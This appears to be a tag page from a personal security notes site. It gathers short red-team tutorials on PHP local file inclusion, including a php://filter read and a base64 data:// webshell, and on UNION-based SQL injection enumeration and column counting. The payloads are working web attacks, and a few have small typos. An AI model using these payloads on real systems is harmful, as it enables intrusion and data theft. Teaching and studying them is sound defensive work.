Posts tagged: #Red-Team

There are probably related tags so check out all tags.

Using PHP filters in local file inclusion

🌱 [seed]
🏷️ php  🏷️ rce  🏷️ red-team  🏷️ webshell 

Imagine a PHP file where you can perform LFI such as

curl http://example.com/vuln.php?lang=en.php

With a badly configured server and app you can use PHP read filters to get the full content

curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php

You can get a webshell or RCE if allow_url_include is enabled

curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami

The shell is <?php system($_GET['cmd'];

[Read more]

Enumerating databases, tables, columns, and user privileges with SQL injection

🌿 [bud]
🏷️ red-team  🏷️ sql-injection 

Using a UNION injection we can find out about a (MySQL/MariaDB) structure.

Here are some minimal examples. Remember to determine the correct number of columns 🌿 and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.

Databases

UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;

Tables

UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;

Columns

UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Privileges

UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES

References

[Read more]

How to determine the number of columns for union SQL injection

🌿 [bud]
🏷️ red-team  🏷️ sql-injection 

A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.

There are two easy strategies for this. Using order by or union. Assume that the following is vulnerable:

SELECT * from users where username='$oops'

order by

In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let $oops = "test' order by 1 -- then the query becomes:

[Read more]